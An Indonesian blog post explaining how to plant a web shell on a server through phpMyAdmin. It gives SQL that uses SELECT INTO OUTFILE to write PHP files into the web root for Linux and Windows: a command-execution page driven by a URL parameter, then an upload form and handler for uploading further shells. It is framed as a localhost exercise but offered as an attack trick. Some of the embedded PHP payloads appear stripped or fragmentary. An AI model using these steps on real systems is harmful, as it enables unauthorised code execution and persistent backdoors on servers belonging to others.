Trik tanam shell lewat PhpMyAdmin


  tanam shell lewat PhpMyAdmin

Selamat Pagi bro,mau share sedikit nih tentang cara tanam shell lewat phpmyadmin,disini saya memperaktekannya menggunakan localhost,langgsung saja.

PhpMyAdmin yang saya pakai bawaan dari LAMPP (Linux) yaitu versi 3.2.4 Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL Kemudian masukkan script SQL pada form yang tersedia :

*untuk Platform linux

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*untuk Platform Windows

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Klik Go!

Note : Jika XAMPP terinstall di direktori lain, silahkan ganti codingnya di bagian SELECT * INTO OUTFILE ‘alamat htdocs nya xampp/cmd.php’ from temptab;

Oke saya anggap hasilnya seperti ini : Your SQL Query has been executed successful

Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)

Contoh : http://localhost/cmd.php?cmd=ls <– ls adalah perintah untuk ngeliat isi file dan direktori di mesin Linux, kalo Windows ya pake dir.

Lanjut lagi! Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL Kemudian masukkan script SQL pada form yang tersedia :

*untuk Platform linux

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('
Upload file :');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*untuk Platform Windows

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('
Upload file :');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go!

Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL Kemudian masukkan script SQL pada form yang tersedia :

*untuk Platform linux

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*untuk Platform Windows

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go! s

aya anggep sukses, sekarang buka http://localhost/form.php

Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya.

Semoga Bermanfaat.

sumber

Fahmi

We’re still Pioneers, We Barely Begun. Our Greatest Accomplishments cannot be behind us, cause our destiny lies above us.

1 Comment

  • Just_Guest
    December 5, 2013 at 2:41 pm

    Wowww, makin tinggi ilmu nya iyaa… keep move 🙂

Leave a Reply